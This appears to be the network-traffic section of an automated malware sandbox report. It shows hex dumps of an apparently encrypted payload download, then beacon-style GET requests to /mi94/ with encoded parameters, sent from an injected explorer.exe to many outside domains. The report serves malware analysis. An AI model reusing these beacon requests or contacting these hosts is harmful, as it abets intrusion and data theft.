c3 0d b5 64 61 c4 0c f7 37 7d f1 55 b8 2e 8f 60 30 af 6d 09 44 e4 bc 8a 19 99 0f e2 64 ad 4b c0 32 10 0a af 71 20 c4 51 af 91 ad b8 34 a5 a8 e3 4c 4d 8f 3a 79 14 d8 db 81 c4 00 7a 2a 76 33 58 d3 f7 42 32 2f b6 4f 3e 79 c0 74 6c ff f6 f8 75 40 3b 07 69 56 38 13 b6 4a 25 e6 94 ff 61 0a 11 99 fe cd e2 20 1e 89 03 1c 74 fc f0 30 4d f6 4c 23 e4 01 ef 87 fa 7f e3 5b 04 a9 09 16 fc e2 ea 14 c9 7f 82 b8 59 2a 83 40 78 37 9c 7d e8 d6 b2 bd 4a fe db 06 62 b4 4b 44 34 3a 5a fd e0 6a 81 e0 99 ac 37 e6 c9 0a 55 51 cd 2e 7e 8b eb e8 8b 5c 65 0f 72 00 38 7e 32 61 e9 7e 4f 5c ad 3e a1 cf c1 71 b2 d9 33 cc e1 6e c9 9a 3f ee 06 3f 9f ba 23 f3 a3 7d f1 dc 66 52 93 12 06 0a 35 9c f7 60 02 02 cb dd bd 4f 70 e2 01 bd 76 93 2a a7 1f 95 3b 3c f5 94 1b 04 a1 78 c2 05 75 06 4c 37 19 e3 7f c4 12 e9 cf 49 be 7b b5 b0 2a 47 cf 89 54 ab 8f b7 bb 4d 23 e0 22 46 4d 62 28 8b 74 67 f7 07 17 42 cd 69 06 f7 75 eb dd ab af 54 52 5e da 25 eb c9 70 1d 7c 27 a1 83 e6 20 06 88 a4 d1 13 6a 73 92 12 19 d0 c1 3d e4 dd ff b4 d5 24 f6 37 a5 ce 60 8f 3c e0 1a d1 b4 54 96 59 f2 87 ae 7d 48 74 9e e7 5f 26 36 c9 58 a4 f1 07 4e c2 3e b9 86 49 b7 b5 71 2c b5 32 44 1e e4 67 2b f7 a4 09 2c 2b 0f 91 a9 02 42 ef 0a 8c 20 08 fe d1 34 c7 a0 f9 46 dd 3c ea ee d8 78 91 1a f7 69 0c 05 8c 91 4a 22 12 8e 7c aa 91 a6 90 ac 50 33 ea 4f 6b 07 71 c8 34 73 b3 63 fa ff ce 7c 19 db 29 e4 77 96 64 03 d0 b9 6b 03 5d 1a 1d ff 5e 1b 9f b2 54 d1 0e 98 aa f9 65 e7 cd 01 8b 9d 83 8a 11 f3 4b 5f d6 b9 2f b0 c7 a8 b7 ab 5d 37 0c 7f d6 01 ea 4b 21 61 63 18 99 e4 a3 1c c6 9f 32 68 f5 62 a7 e4 8a e4 e4 f8 d0 34 b5 06 aa 1f 06 f6 49 8b 19 4e 24 0b a5 39 51 1c 4b 49 1c 91 a9 87 28 5b d0 bd 82 89 79 8c ce d0 14 31 f2 98 52 1b e0 57 09 bf cc 54 62 3d d2 18 8a 49 d3 bb 59 32 e2 79 a8 c5 bf b8 46 9f 31 75 00 89 2a 6e da 4d 3a 89 73 ba 21 24 32 ce 30 62 19 8b 73 82 75 73 90 ba 3a 8c 29 4d 21 0e 29 39 87 7b a3 74 6f 72 f3 e3 f0 f3 98 30 11 63 31 76 b1 77 ab 38 f7 36 82 1a 3e ab e6 f0 19 f6 25 d3 14 2d 89 73 fe be d5 a6 e9 29 9b 2c f6 01 7a e9 c9 d5 ec 16 6a f5 6a c7 91 96 3f 07 d5 d9 05 4f 48 8a b0 7c b7 40 07 b8 8f 0f f1 d5 08 90 ac 18 b4 d8 57 7e 0b b4 31 ff 5d f2 8f 94 73 82 a9 45 72 ec 96 44 06 e4 ea 3c 20 20 da 1b 96 a4 4b 1f 8c d8 e3 97 6e 6a 11 9b 88 4e 21 3f b4 57 0e 90 6d 1c 4b 98 af 59 69 cd c3 21 5e a6 a0 9b db 88 3f 9d 4d cc 8a 8a 33 74 2c e2 bb e0 77 3b ba a5 f0 99 c1 e9 7f 7d c0 7f 1c ca e9 8e 1e 33 d1 36 4c 0c 92 47 2c da 89 7b b1 19 9a 80 a7 02 fc 1e 5c e1 65 de d9 5e 53 c4 01 19 ea 25 39 37 20 c7 a0 aa 55 7d 46 46 27 21 85 5c 8b 3f 87 42 e6 44 0c ab 68 92 19 70 fc 5f 9c 2e 8f 60 30 Data Ascii: :VhTm)ao<>u39`:Lb?q%gJC{RZ9_j "VYA?M3t,w;}36B(I,nj#v5E14`tFXYN7f4RO5da7}U.`0mDdK2q Q4LM:yzv3XB2/O>ytlu@;iV8J%a t0ML#[Y@x7}JbKD4:Zj7UQ.~\er8~2a~O\>q3n??#}fR5`Opv;<xuL7I{GTM#"FMb(tgBiuTR^%p\|' js=$7`<TY}Ht_&6XN>Iq,2Dg+,+B 4F<xiJ"\|P3Okq4sc\|)wdk]^TeK_/]7K!ac2hb4IN$9QKI([y1RWTb=IY2yF1u*nM:s!$20bsus:)M!)9{tor0c1vw86>%-s),zjj?OH\|@W~1]sErD< KnjN!?WmKYi!^?M3t,w;}36LG,{\e^S%97 U}FF'!\?BDhp_.`0
Mar 30, 2023 14:19:42.770494938 CEST	145	IN	Data Raw: af 6d 09 ef 18 b4 60 f6 04 69 5b 8b 30 2d 79 dd 8d 6c 16 85 20 09 e8 06 0c cb 01 c0 a5 50 5a a0 d0 e9 83 8d 14 23 62 6f 59 66 c3 78 1f 50 30 3c 6a 24 8b 2f b6 4f 3e 79 c0 74 6c ff f6 f8 75 40 3b 07 69 06 7d 13 b6 06 24 e7 94 c2 d3 45 2d 99 fe cd Data Ascii: m`i[0-yl PZ#boYfxP0<j$/O>ytlu@;i}$E- t;LL#0[(@xw}HbKD4:Zk79UQ.~^eO8n2a~O\.q3~??#}fR5`Opv*;<xuL7
Mar 30, 2023 14:19:42.770669937 CEST	147	IN	Data Raw: f9 65 e7 cd 01 8b 9d 83 8a 11 f3 4b 5f d6 b9 2f b0 c7 a8 b7 ab 5d 37 0c 7f d6 01 ea 4b 21 61 63 18 99 e4 a3 1c c6 9f 32 68 f5 62 a7 e4 8a e4 e4 f8 d0 34 b5 06 aa 1f 06 f6 49 8b 19 4e 24 0b a5 39 51 1c 4b 49 1c 91 a9 87 28 5b d0 bd 82 89 79 8c ce Data Ascii: eK_/]7K!ac2hb4IN$9QKI([y1RWTb=IY2yF1u*nM:s!$20bsus:)M!)9{tor0c1vw86>%-s),zjj?OH\|@W~1]sE
Mar 30, 2023 14:19:42.770756960 CEST	148	IN	Data Raw: 06 7d 13 b6 06 24 e7 94 c2 d3 45 2d 99 fe cd e2 20 1e 89 03 fc 74 fe f1 3b 4c fc 4c 23 30 03 ef 87 fa 7f e3 5b 04 a9 09 06 0e e3 ea 14 d9 7f 82 b8 a9 28 83 40 78 77 9c 7d f8 d6 b2 bd 48 fe db 03 62 b5 4b 44 34 3a 5a f8 e0 6b 81 e0 99 ac 37 e6 39 Data Ascii: }$E- t;LL#0[(@xw}HbKD4:Zk79UQ.~^eO8n2a~O\.q3~??#}fR5`Opv;<xuL7I{GTM#"FMb(tgBiuTR^%p\|' js
Mar 30, 2023 14:19:42.770817041 CEST	149	IN	Data Raw: 1c c4 69 79 41 22 d6 a4 2f 36 d7 61 f2 c9 22 5b 59 c1 7b 8f d9 4e 14 de 4e bb 45 1b 6a be 16 1c 03 1e df e5 02 b9 07 24 6b e0 77 7f 06 78 64 fe ec 02 6f 7a 51 00 2a 0a 9f 9e 72 af 6f d6 67 e9 e0 0e b3 8d f1 94 90 ba 3a da a2 7f a8 7b c5 b2 f5 7f Data Ascii: iyA"/6a"[Y{NNEj$kwxdozQrog:{{gEr%_B\^9x/+m{O<z?RDl\|4}Z7/lNme"wfaChPny*)b^]OL94jv@-b
Mar 30, 2023 14:19:42.770868063 CEST	151	IN	Data Raw: ce 2c cf c5 a5 6e 92 19 65 27 1c c0 cc 19 c6 53 95 91 54 e9 fb fb 10 17 74 9c d2 f8 86 c7 bd 1a c9 9e 06 62 b2 a1 4c e9 24 b7 2a 8e 4d 77 a0 5f dc b9 4c e6 c4 11 f9 55 b9 9c 6f 34 26 fd 0a 23 99 08 a5 24 6a cd b0 18 0c 9f fd 43 f4 e2 c3 88 f5 6a Data Ascii: ,ne'STtbL$Mw_LUo4&#$jCjBPRkKmAKz.JEJDN3tHDytoHxM!$+q>/(81KldK5ka:!M=`zepPJlWr`?5jw
Mar 30, 2023 14:19:42.770915985 CEST	152	IN	Data Raw: 89 7e 65 57 3f 56 71 d6 b2 57 d5 f2 94 40 fe d3 89 90 8d c8 03 10 28 5f b5 65 9e ce 89 e7 45 99 5c 30 b3 fa e7 c1 54 a8 ca 23 82 e2 56 68 d0 76 8c e0 b4 df b2 2e ac 1b d1 09 fe a1 a0 80 47 2b 93 ee 08 95 38 9b 90 39 0b 12 5c 8d b2 b7 75 dc 58 93 Data Ascii: ~eW?VqW@(_eE\0T#Vhv.G+89\uX=s]Kl=mHV?Ear5:%hs_OK%2ggsubz(nYDBW7q..Z_1Nl;!n3>J-^@.TW
Mar 30, 2023 14:19:42.770966053 CEST	153	IN	Data Raw: e5 f9 f5 71 54 3e ee c5 87 bb 2a 42 b0 1a 6b c3 c8 b1 16 5e 50 e0 6a 43 45 7b 60 dc 81 d9 8f 3d fa 1e 38 14 ae de 66 03 33 ed 16 12 38 07 5c 72 35 aa b0 30 76 e2 e4 6e 09 7c c8 a7 17 dd b9 5a cf a0 7b b3 e2 7f f0 e8 bd ab c5 26 3e b2 6e 51 5c 50 Data Ascii: qT>*Bk^PjCE{`=8f38\r50vn\|Z{&>nQ\PdX,L9C0&D"TRpwgS?/ 6 _lQHKc!^bP{e8_-k`npKqRW)Hcw,~Raa6t
Mar 30, 2023 14:19:42.771014929 CEST	155	IN	Data Raw: 48 00 14 e6 c6 f8 2a 1e 4b 06 cf 4d 35 08 4e bf f8 79 5e 37 28 12 8d e8 55 e7 4b 26 f5 b4 87 73 b4 83 a4 0d 70 a2 78 56 31 82 f7 6c 6f bb f9 2b 6b c9 86 e7 5f 9f 6f 5b b4 37 52 a2 46 50 eb e2 e8 64 77 68 af 88 6e 90 8b 1c 94 e3 b4 3c 10 f4 56 0a Data Ascii: H*KM5Ny^7(UK&spxV1lo+k_o[7RFPdwhn<VFY_FZXsuy'CZE5XMkG$^9\;GkYUrxfl&#r7RbY/$3<q3GIEz
Mar 30, 2023 14:19:42.771065950 CEST	156	IN	Data Raw: 65 26 30 42 93 0d aa b5 ec 30 30 63 4a 59 60 9a 95 1b 56 d5 5f 2f 03 da 39 b7 37 2f 92 02 c1 cd 30 36 be 5f f6 55 57 81 32 38 0a 0c 1a ba 28 e7 25 4c 21 16 8b c0 c8 b9 28 69 16 f1 e0 8b 70 37 da 6b 38 e0 0b 29 85 51 e1 73 65 f2 bc 4f 1c 89 87 8e Data Ascii: e&0B00cJY`V_/97/06_UW28(%L!(ip7k8)QseOEw4s=>#"mJ-#y=) 0@@MI9zNoqeSqw3mr6zKD90Dk=c\4x_c0i]iXwOqM SE
Mar 30, 2023 14:19:42.911575079 CEST	157	IN	Data Raw: 4e aa 43 0c 53 cf 57 65 2f 94 13 d2 b5 a8 32 db a0 b9 59 a0 9b db bb 63 25 49 47 f7 76 00 2d 34 23 44 e8 fe 66 4e 2e ad 69 00 12 6f fc 27 80 1c ca e9 05 62 8b d5 b7 af f3 92 47 2c 51 d5 e3 b5 d8 55 90 66 c9 f4 2d a7 6a 38 32 58 bd ac c4 01 19 61 Data Ascii: NCSWe/2Yc%IGv-4#DfN.io'bG,QUf-j82Xay3hBwp3lP&`eW=#0- c{$'I@$/=}ds(}=ZUv$8jtG~0Foj&"t>\|Smy5M

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49809	198.54.117.216	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 30, 2023 14:21:14.259000063 CEST	386	OUT	GET /mi94/?7ncHc8=Tv6lQt-XnpBl3ra&iN64=CmkHYlvtWFyiY6x7wzgggV7o1XWqH1EIkW2vDHN+0HbYWyx2WNdLHwPWYAq7GV6cOSXz HTTP/1.1 Host: www.crosswalkconsulting.co.uk Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.11.20	49835	142.250.186.51	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 30, 2023 14:25:41.708396912 CEST	575	OUT	GET /mi94/?iN64=ORIqx8IF1+X+2hN52P87hXte5s/HoBMDp1q1F2AtNmI3dmVw+3KXXOfhBFQ6DTUSnU2z&7ncHc8=Tv6lQt-XnpBl3ra HTTP/1.1 Host: www.edelman-production.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 30, 2023 14:25:41.826443911 CEST	576	IN	HTTP/1.1 301 Moved Permanently Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 30 Mar 2023 12:25:41 GMT Location: https://www.edelman-production.com/mi94/?iN64=ORIqx8IF1+X+2hN52P87hXte5s/HoBMDp1q1F2AtNmI3dmVw+3KXXOfhBFQ6DTUSnU2z&7ncHc8=Tv6lQt-XnpBl3ra Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.11.20	49839	198.54.117.212	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 30, 2023 14:26:23.800246000 CEST	671	OUT	GET /mi94/?iN64=yKcY3jotfSPLyB/ftSMp74iudURdb3SAsX12brKJ4aUNBvL8L7J7V3FDmQx4l6kHWp2H&4hKt-j=ZVzPwN HTTP/1.1 Host: www.anotherworldrecord.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.11.20	49844	66.29.145.79	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 30, 2023 14:27:24.608937025 CEST	722	OUT	GET /mi94/?7ncHc8=Tv6lQt-XnpBl3ra&iN64=QL/B8MzEY0HNvMy3VPGhV3P43kBHTcVAQ0SbOcVGS/U14nEiro/6l5lW3aX+iQqKLRyM HTTP/1.1 Host: www.luivix.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 30, 2023 14:27:24.850609064 CEST	722	IN	HTTP/1.1 404 Not Found Date: Thu, 30 Mar 2023 12:27:24 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 279 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 75 69 76 69 78 2e 6f 6e 6c 69 6e 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.luivix.online Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.11.20	49811	112.196.98.174	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 30, 2023 14:21:34.782742977 CEST	393	OUT	GET /mi94/?iN64=mO3gULgzVK9RKFx+HvnjTN/7ulsiA608FnchGSf2u+Dat8/14sLz5+BvjwL16EDGrJ0d&7ncHc8=Tv6lQt-XnpBl3ra HTTP/1.1 Host: www.bestpetfinds.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 30, 2023 14:21:34.975202084 CEST	394	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 30 Mar 2023 12:21:34 GMT Server: Apache/2.4.41 (Ubuntu) Location: https://www.bestpetfinds.com/mi94/?iN64=mO3gULgzVK9RKFx+HvnjTN/7ulsiA608FnchGSf2u+Dat8/14sLz5+BvjwL16EDGrJ0d&7ncHc8=Tv6lQt-XnpBl3ra Content-Length: 429 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 65 73 74 70 65 74 66 69 6e 64 73 2e 63 6f 6d 2f 6d 69 39 34 2f 3f 69 4e 36 34 3d 6d 4f 33 67 55 4c 67 7a 56 4b 39 52 4b 46 78 2b 48 76 6e 6a 54 4e 2f 37 75 6c 73 69 41 36 30 38 46 6e 63 68 47 53 66 32 75 2b 44 61 74 38 2f 31 34 73 4c 7a 35 2b 42 76 6a 77 4c 31 36 45 44 47 72 4a 30 64 26 61 6d 70 3b 37 6e 63 48 63 38 3d 54 76 36 6c 51 74 2d 58 6e 70 42 6c 33 72 61 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 65 73 74 70 65 74 66 69 6e 64 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.bestpetfinds.com/mi94/?iN64=mO3gULgzVK9RKFx+HvnjTN/7ulsiA608FnchGSf2u+Dat8/14sLz5+BvjwL16EDGrJ0d&7ncHc8=Tv6lQt-XnpBl3ra">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.bestpetfinds.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.11.20	49813	185.53.179.91	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 30, 2023 14:22:17.396744013 CEST	402	OUT	GET /mi94/?iN64=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&7ncHc8=Tv6lQt-XnpBl3ra HTTP/1.1 Host: www.credit-cards-54889.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 30, 2023 14:22:17.415194035 CEST	402	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Thu, 30 Mar 2023 12:22:17 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.11.20	49815	212.32.237.91	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 30, 2023 14:22:58.255592108 CEST	410	OUT	GET /mi94/?iN64=1+ICr/6rV9rD5T+b2fkS8puQwviKUFcipOdxmxkdKen6Mbo7iu+c87PDf8Q8GUw5BiYT&7ncHc8=Tv6lQt-XnpBl3ra HTTP/1.1 Host: www.realdigitalmarketing.co.uk Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 30, 2023 14:22:58.283018112 CEST	411	IN	HTTP/1.1 302 Found cache-control: max-age=0, private, must-revalidate connection: close content-length: 11 date: Thu, 30 Mar 2023 12:22:58 GMT location: http://survey-smiles.com server: nginx set-cookie: sid=9b1758fa-cef5-11ed-a6dd-c6d3205327c2; path=/; domain=.realdigitalmarketing.co.uk; expires=Tue, 17 Apr 2091 15:37:05 GMT; max-age=2147483647; HttpOnly Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 Data Ascii: Redirecting

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.11.20	49817	213.186.33.5	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 30, 2023 14:23:18.598818064 CEST	418	OUT	GET /mi94/?7ncHc8=Tv6lQt-XnpBl3ra&iN64=oUKF/a0VBYM/wUiPoEbZf2Cmkmjvp/vv1ZeFcEWnUAPVfAMIxMINRx/0nluyfFKvqa1+ HTTP/1.1 Host: www.laxmi.digital Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 30, 2023 14:23:18.619414091 CEST	419	IN	HTTP/1.1 302 Moved Temporarily server: nginx date: Thu, 30 Mar 2023 12:23:18 GMT content-type: text/html content-length: 138 location: http://www.laxmi.digital x-iplb-request-id: 54113423:C299_D5BA2105:0050_64257F36_18353CF8:27B91 x-iplb-instance: 16976 set-cookie: SERVERID77446=200176\|ZCV/O\|ZCV/O; path=/; HttpOnly connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.11.20	49819	199.33.123.34	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 30, 2023 14:24:00.177263021 CEST	426	OUT	GET /mi94/?7ncHc8=Tv6lQt-XnpBl3ra&iN64=DPf7iOV4tZbGC7wAZwygpODOxt/Orl+HPYO0G2nQwomd4kRyfSlRFlrSB1ttg/LMfS7c HTTP/1.1 Host: www.hunterboots--canada.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 30, 2023 14:24:00.680962086 CEST	428	IN	HTTP/1.1 404 Not Found Date: Thu, 30 Mar 2023 12:24:00 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: zenid=6f8kl1kif9jlolshvdsra7dpb3; path=/; domain=.www.hunterboots--canada.com; secure; HttpOnly Upgrade: h2 Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 Data Raw: 31 65 63 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 45 4a 77 49 4e 4b 39 48 47 50 37 62 72 41 6a 46 55 75 75 79 34 6c 62 6c 44 62 73 45 47 75 7a 55 47 62 63 47 6e 64 74 68 32 63 59 22 20 2f 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 3a 20 48 75 6e 74 65 72 20 42 6f 6f 74 73 20 43 61 6e 61 64 61 20 2d 20 53 68 6f 70 20 52 61 69 6e 62 6f 6f 74 73 20 57 69 74 68 20 46 72 65 65 20 53 68 69 70 70 69 6e 67 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 20 0d 0a 0d 0a 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 6d 65 6e 20 4d 65 6e 20 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 48 75 6e 74 65 72 20 42 6f 6f 74 73 20 43 61 6e 61 64 61 20 2d 20 53 68 6f 70 20 52 61 69 6e 62 6f 6f 74 73 20 57 69 74 68 20 46 72 65 65 20 53 68 69 70 70 69 6e 67 20 3a 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 57 6f 6d 65 6e 20 4d 65 6e 20 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 69 6d 61 67 65 74 6f 6f 6c 62 61 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 22 20 2f 3e 0d 0a 0d 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 75 Data Ascii: 1ec1<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en"><head> <meta name="google-site-verification" content="EJwINK9HGP7brAjFUuuy4lblDbsEGuzUGbcGndth2cY" /> <title>Page Not Found : Hunter Boots Canada - Shop Rainboots With Free Shipping</title><meta name="viewport" content="width=device-width, initial-scale=1" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="keywords" content="Women Men Page Not Found" /><meta name="description" content="Hunter Boots Canada - Shop Rainboots With Free Shipping : Page Not 